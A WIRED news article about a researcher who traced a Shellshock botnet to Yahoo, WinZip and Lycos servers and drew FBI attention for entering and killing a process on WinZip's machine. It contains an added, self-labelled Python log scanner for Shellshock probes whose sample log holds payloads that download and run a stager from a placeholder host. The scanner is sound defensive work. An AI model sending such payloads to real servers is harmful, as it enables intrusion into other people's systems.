FBI Pays Visit to Researcher Who Revealed Yahoo Hack


[Illustration: Ross Patton/WIRED]

Jonathan Hall was trying to help the internet. Earlier this week, the 29-year-old hacker and security consultant revealed that someone had broken into machines running inside several widely used internet services, including Yahoo, WinZip, and Lycos. But he may have gone too far.

Hall---the president of a security firm called Future South Technologies---went out of his way to spotlight a network of compromised computer servers that, he says, are controlled by Romanian hackers. He published his findings on his blog, saying he simply wanted to help these companies clean up a nasty computer problem. But with his aggressive investigation, he may have run afoul of the nation's anti-hacking law, the Computer Fraud and Abuse Act, or CFAA.

"I might wake up tomorrow in handcuffs," says Hall, who was visited by the FBI on Tuesday.

His uncertainty is an example of the general unease in the computer security community caused by aggressive government prosecutions under the CFAA. Enacted in 1986, the law makes it illegal to access a computer without authorization, but security researchers and federal prosecutors often don't agree on what that means. Several high-profile hacking cases have played out in this gray area: Andrew "Weev" Auernheimer and Daniel Spitler were charged after writing a script that accessed information on a publicly available AT&T website, and Aaron Swartz for downloading a cache of articles that he was permitted to access.

In Hall's case, he went a little further. He says he gained access to a server belonging to compression software maker WinZip and issued a command on the machine that displayed the contents of a malicious file on his own monitor. After that, he ran a "kill" command on WinZip's server that terminated the malicious program.

"It was trying to find an active working worm that was already in circulation," he says. "That brought me to a valid active botnet that was already in use."

The Honey Pot

His story began late last week, after he set up what's known as a "honey pot," a computer---which he could monitor---that appeared to be vulnerable to the recently disclosed Shellshock bug. Hall's server was attacked, but the attack came from an unlikely place: a server that belonged to WinZip.
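What a honeypot like Hall's actually yields is a web access log full of probes. The following is an added example, not code from the article or from Future South Technologies, of the passive half of that work: reading an Apache combined-format log, recognising the Shellshock trigger (a header value that begins with a bash function definition, `() {`, followed by the command to run after `};`), and pulling out the source address and any hosts the payload calls back to. The log lines are constructed for this example and use RFC 5737 documentation addresses; the function and class names are my own.

```python
"""Added example: spotting Shellshock probes in a honeypot's web access log.

Not code from the WIRED article or from Future South Technologies. Log lines
below are constructed; addresses come from the RFC 5737 documentation ranges.
"""
import re
from dataclasses import dataclass, field
from typing import Iterable, List, Dict

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent".
# Quoted fields may contain backslash-escaped quotes, hence the (?:[^"\\]|\\.)* idiom.
_QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + _QUOTED + r' (\d{3}) (\S+) ' + _QUOTED + ' ' + _QUOTED + '$'
)

# Shellshock (CVE-2014-6271): vulnerable bash imported a function definition from any
# environment variable whose value began "() {" and then executed whatever followed the
# closing "};". CGI exports request headers as HTTP_* variables, so any header can carry it.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{.*?\}\s*;\s*(?P<cmd>.+)", re.DOTALL)

# IPv4 literals inside the payload: the stager/C2 hosts that are the next hop to report.
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


@dataclass
class Probe:
    src_ip: str
    timestamp: str
    header: str                                  # which field carried the payload
    command: str                                 # what bash would have executed
    callouts: List[str] = field(default_factory=list)  # IPv4 addresses named in the command


def _unescape(raw: str) -> str:
    """Undo Apache's backslash escaping, then any URL-encoding used to hide '() {'."""
    from urllib.parse import unquote
    return unquote(re.sub(r"\\(.)", r"\1", raw))


def parse_line(line: str) -> List[Probe]:
    """Return one Probe per header field of this log line that carries a Shellshock trigger."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return []
    src_ip, ts, req, _status, _size, referer, ua = m.groups()
    probes = []
    for name, raw in (("request", req), ("referer", referer), ("user-agent", ua)):
        hit = SHELLSHOCK_RE.search(_unescape(raw))
        if hit:
            cmd = hit.group("cmd").strip()
            probes.append(Probe(src_ip, ts, name, cmd, sorted(set(IPV4_RE.findall(cmd)))))
    return probes


def scan_log(lines: Iterable[str]) -> List[Probe]:
    out: List[Probe] = []
    for line in lines:
        out.extend(parse_line(line))
    return out


def callouts_by_source(probes: List[Probe]) -> Dict[str, List[str]]:
    """Map each attacking host to the hosts its payloads fetch from or report to."""
    summary: Dict[str, set] = {}
    for p in probes:
        summary.setdefault(p.src_ip, set()).update(p.callouts)
    return {ip: sorted(hosts) for ip, hosts in summary.items()}


# Constructed sample log (not real traffic).
SAMPLE_LOG = [
    # Probe in the User-Agent: the payload downloads a stager and runs it.
    '203.0.113.7 - - [26/Sep/2014:02:14:11 -0500] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 '
    '"-" "() { :;}; /bin/bash -c \\"wget http://198.51.100.20/x.sh -O /tmp/x; chmod +x /tmp/x; /tmp/x\\""',
    # Same trick URL-encoded in the Referer, which defeats a naive grep for "() {".
    '203.0.113.7 - - [26/Sep/2014:02:14:12 -0500] "GET /cgi-bin/status HTTP/1.1" 404 209 '
    '"%28%29%20%7B%20%3A%3B%7D%3B%20/usr/bin/curl%20http://198.51.100.20/y.sh" "Mozilla/5.0"',
    # Ordinary traffic, which must not trigger.
    '198.51.100.44 - - [26/Sep/2014:02:15:02 -0500] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for probe in scan_log(SAMPLE_LOG):
        print(f"{probe.timestamp} {probe.src_ip} via {probe.header}: {probe.command}")
    print(callouts_by_source(scan_log(SAMPLE_LOG)))
```

Everything this produces is observed passively on a machine the researcher owns: the attacking address (in the article, a WinZip server) and the hosts its payload reaches out to. The step that lands in CFAA territory is the one after this, logging into the attacking host to read or kill what is running there; the defensible follow-up to output like this is to report the source and callout addresses to their owners and, as Hall did, to the FBI.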

After a bit of detective work, Hall found the vulnerable server and gained access to it, leveraging the Shellshock vulnerability. He discovered that the server was part of a network of computers, all connecting back to an internet relay chat, or IRC, server that was operated by two Romanian hackers.

By Saturday night, Hall's budding interest in the internet bug known as Shellshock was becoming a sleepless obsession. He kept digging deeper and deeper, discovering other computers that connected to the IRC server, including machines that belonged to Yahoo, Lycos Internet, and other companies. On Monday, Yahoo confirmed that it had been compromised, although Hall and Yahoo disagree on the exact nature of the compromise. Hall says that it was due to Shellshock; Yahoo says not.

Hall says examining and then killing the malicious code was a kind of justified trespass, much like removing a child from an overheating car. But others are not so sure. "It's kind of hard to argue that being a public server, they've authorized you to kill processes," says Robert Graham, the CEO of Errata Security, "but on the other hand this law is pretty vague."

Where is the Line?

Graham himself wrote a script that scanned the internet for servers that were vulnerable to the Shellshock bug. He was doing this for research purposes, querying publicly available servers, but on the face of it, the work he did was a lot like the work that landed Auernheimer and Spitler in the sights of federal prosecutors.

Is an ad network that runs a pop-up JavaScript program on your browser actually authorized to run that code? Maybe not, Graham says. "Where that line is drawn is really hard for us to say," he says.

The FBI showed up at Hall's New Orleans house on Tuesday, wanting to ask about the research he'd done. To a certain extent, that's to be expected. Hall says he copied the FBI on his original email notifying Yahoo of its problems. But it isn't his first run-in with authorities. A decade ago, Hall was charged with doing the technical work in a DDoS-for-hire operation. He says he had nothing to do with those denial-of-service attacks, and the charges were eventually dropped.

"I don't know what they're going to do," he says of the FBI's Tuesday visit. "It was an awkward kind of conversation."